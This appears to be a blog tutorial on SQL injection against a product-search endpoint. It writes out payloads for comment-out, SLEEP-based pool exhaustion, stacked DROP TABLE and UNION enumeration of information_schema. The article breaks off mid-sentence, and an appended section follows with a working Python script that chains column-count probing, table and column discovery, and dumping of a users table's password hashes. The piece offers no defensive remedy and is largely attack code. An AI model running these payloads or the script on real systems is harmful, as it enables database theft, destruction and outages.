
Quickly understand the basic principles of sql injection

Nov 29, 2019 02:41 PM
sql injection principle


## Basic Principles of SQL Injection

Web technology is developing rapidly, but the traditional craft of writing SQL by hand is still favoured by quite a few developers. After all, compared with learning a complex set of ORM rules, doing it by hand is more convenient and intuitive. People who write their own SQL have usually heard that SQL injection is dangerous, but they tell themselves: my SQL statement is so simple that it cannot be injected.

Take five minutes to read this complete example. From now on, you will not dare to take that chance.

Simple scenario

There is a web interface that takes a product name as input and displays the corresponding price, place of production and date of production. For example, entering Hammer displays:

| Product | Price | Place of production | Date of production |
|---|---|---|---|
| Claw Hammer | 12.98 | American | 2019.11.07 |
| Club Hammer | 29.98 | Canada | 2019.11.11 |

We skip the process of building the web search interface and focus directly on the key part: SQL injection. To implement the function above, we can roughly guess that the SQL statement the server uses looks like this:

```sql
SELECT ? FROM ? WHERE ? LIKE '%Hammer%';
```

where ? stands for the table and column names we do not yet know. The only part of this SQL that can be manipulated is the input inside the single quotes, '%Hammer%'. If we type a single quote into the search box, the statement becomes:

```sql
select ? from ? where ? like '%'%';
```

Spliced like this, the statement is a SQL syntax error and returns nothing. We need `--` to comment out the trailing single quote:

```sql
select ? from ? where ? like '%'; -- %';
```

Everything after `--` is a comment (in MySQL the `--` must be followed by at least one space; `#` works as well), so the WHERE clause is now `like '%'` and every product comes back. So far there is still no whiff of danger.

| Product | Price | Place of production | Date of production |
|---|---|---|---|
| Claw Hammer | 12.98 | American | 2019.11.07 |
| Club Hammer | 29.98 | Canada | 2019.11.11 |
| Paring Knife | 10.98 | China | 2019.11.11 |
| Boning Knife | 19.98 | China | 2019.01.01 |

Try a delay

Holding on to the single quote we learned to break out of in the previous step, let's try a simple delay statement:

```sql
select ? from ? where ? like '%Hammer%' and 1 = SLEEP(2); -- %';
```

Now the query takes at least 2 seconds to return (SLEEP returns 0, so `1 = SLEEP(2)` is false and no rows come back, but SLEEP runs once for every row that matches the LIKE). Lengthen the delay, fire off a handful of these requests from a script at the same time, and every connection in the server's database pool is tied up in one go.

Of course, there are even more destructive ones!

```sql
select ? from ? where ? like '%Hammer%'; drop table xxxx; -- %';
```

The `;` ends the original statement, so whatever follows runs as a second one: you can delete a table or a whole database outright. (This stacked form only works when the application's database API executes several statements per call; many drivers run exactly one statement and reject the rest, whereas an API such as PHP's mysqli_multi_query runs it as written.) As for how to know which tables the database has, that is, how to fill in the xxxx in the statement above?

union: do whatever you want

We need to know what tables this database has; only then can we get at useful information.

UNION stitches the rows of different queries together into one result (both sides must return the same number of columns; the page displays four, so the injected SELECT needs four). Give it a try:

```sql
select ?,?,?,? from ? where ? like '%Hammer%' UNION (select 1,2,3,4 from dual); -- %';
```

| Product | Price | Place of production | Date of production |
|---|---|---|---|
| Claw Hammer | 12.98 | American | 2019.11.07 |
| Club Hammer | 29.98 | Canada | 2019.11.11 |
| 1 | 2 | 3 | 4 |

You can see that the fake row 1,2,3,4 has been stitched successfully into the search result.

MySQL keeps its own metadata in the information_schema database. Let's look for useful information there.

```sql
select ? from ? where ? like '%Hammer%' UNION (select TABLE_NAME,TABLE_SCHEMA,3,4 from information_schema.tables); -- %';
```
| Product | Price | Place of production | Date of production |
|---|---|---|---|
| Claw Hammer | 12.98 | American | 2019.11.07 |
| Club Hammer | 29.98 | Canada | 2019.11.11 |
| author | hawkeye | 3 | 4 |
| products | hawkeye | 3 | 4 |
| user | hawkeye | 3 | 4 |
| ........ | | 3 | 4 |

Now that the database name and the table names are known, anyone can do whatever they like with them (including the DROP executed above).

One look at the list and it is easy to guess that the table we are querying is products. Next we dig out the actual columns of products.

```sql
select ? from ? where ? like '%Hammer%' UNION (select COLUMN_NAME,TABLE_SCHEMA,3,4 from information_schema.columns where table_name = 'products'); -- %';
```
| Product | Price | Place of production | Date of production |
|---|---|---|---|
| Claw Hammer | 12.98 | American | 2019.11.07 |
| Club Hammer | 29.98 | Canada | 2019.11.11 |
| id | hawkeye | 3 | 4 |
| name | hawkeye | 3 | 4 |
| price | hawkeye | 3 | 4 |
| address | hawkeye | 3 | 4 |
| updated_at | hawkeye | 3 | 4 |

So, with these two steps we know the table name and the column names, and the complete SQL behind the query API must be (filling in every ? from above):

```sql
select name,price,address,updated_at from products where name like '%Hammer%';
```

By repeating the steps above, you can pull every piece of information in the database out through this one small entry point (for example the user table discovered above
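The union-based enumeration above, carried through as an added example that is not part of the original article. It runs against a constructed SQLite database: SQLite's `sqlite_master` catalogue stands in for `information_schema.tables` and `information_schema.columns`, and because SQLite accepts neither `from dual` nor parentheses around a UNION member, the payloads are written without them. It also adds the step the article takes for granted, probing how many columns the search returns before any UNION is accepted, and then reads a users table (constructed here, with placeholder hash strings) through the product search.

```python
import sqlite3


def make_db():
    """Constructed sample database: the article's products table plus a users
    table for the enumeration to discover. SQLite stands in for MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL, address TEXT, updated_at TEXT);
        CREATE TABLE users (id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'Claw Hammer', 12.98, 'American', '2019.11.07');
        INSERT INTO products VALUES (2, 'Club Hammer', 29.98, 'Canada', '2019.11.11');
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash-1');
        INSERT INTO users VALUES (2, 'alice', 'constructed-hash-2');
    """)
    return conn


def search(conn, term):
    """The article's vulnerable search endpoint: term is spliced into the SQL text."""
    sql = f"SELECT name, price, address, updated_at FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def find_column_count(conn, max_cols=10):
    """UNION is only accepted when both sides return the same number of columns,
    so probe with 1, 2, 3, ... constants until the database stops complaining."""
    for n in range(1, max_cols + 1):
        constants = ", ".join(str(i) for i in range(1, n + 1))
        try:
            search(conn, f"' UNION SELECT {constants} -- ")
            return n
        except sqlite3.OperationalError:
            continue  # column-count mismatch, try one more
    return None


def list_tables(conn):
    """information_schema.tables step: table names ride in the Product column;
    a marker in the Price column tells catalogue rows apart from real products."""
    rows = search(conn, "' UNION SELECT name, 'tbl', 3, 4 FROM sqlite_master WHERE type='table' -- ")
    return sorted(r[0] for r in rows if r[1] == "tbl")


def table_ddl(conn, table):
    """information_schema.columns step: SQLite keeps the CREATE TABLE text in
    sqlite_master.sql, which lists the column names."""
    rows = search(conn, f"' UNION SELECT sql, 'ddl', 3, 4 FROM sqlite_master WHERE name = '{table}' -- ")
    return next(r[0] for r in rows if r[1] == "ddl")


def dump_table(conn, table, col_a, col_b):
    """Final step: read two columns of any table through the product search response."""
    rows = search(conn, f"' UNION SELECT {col_a}, {col_b}, 'row', 4 FROM {table} -- ")
    return sorted((r[0], r[1]) for r in rows if r[2] == "row")


def enumerate_db():
    """Chain the steps exactly as an attacker would: column count, tables, columns, data."""
    conn = make_db()
    result = {"columns": find_column_count(conn)}
    result["tables"] = list_tables(conn)
    result["users_ddl"] = table_ddl(conn, "users")
    result["users"] = dump_table(conn, "users", "username", "password_hash")
    return result


if __name__ == "__main__":
    for key, value in enumerate_db().items():
        print(f"{key}: {value}")
```

Each step only needs the search response, which is why a read-only product lookup is enough to walk the whole database; the marker values ('tbl', 'ddl', 'row') are just constants chosen so the injected rows can be told apart from genuine products.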
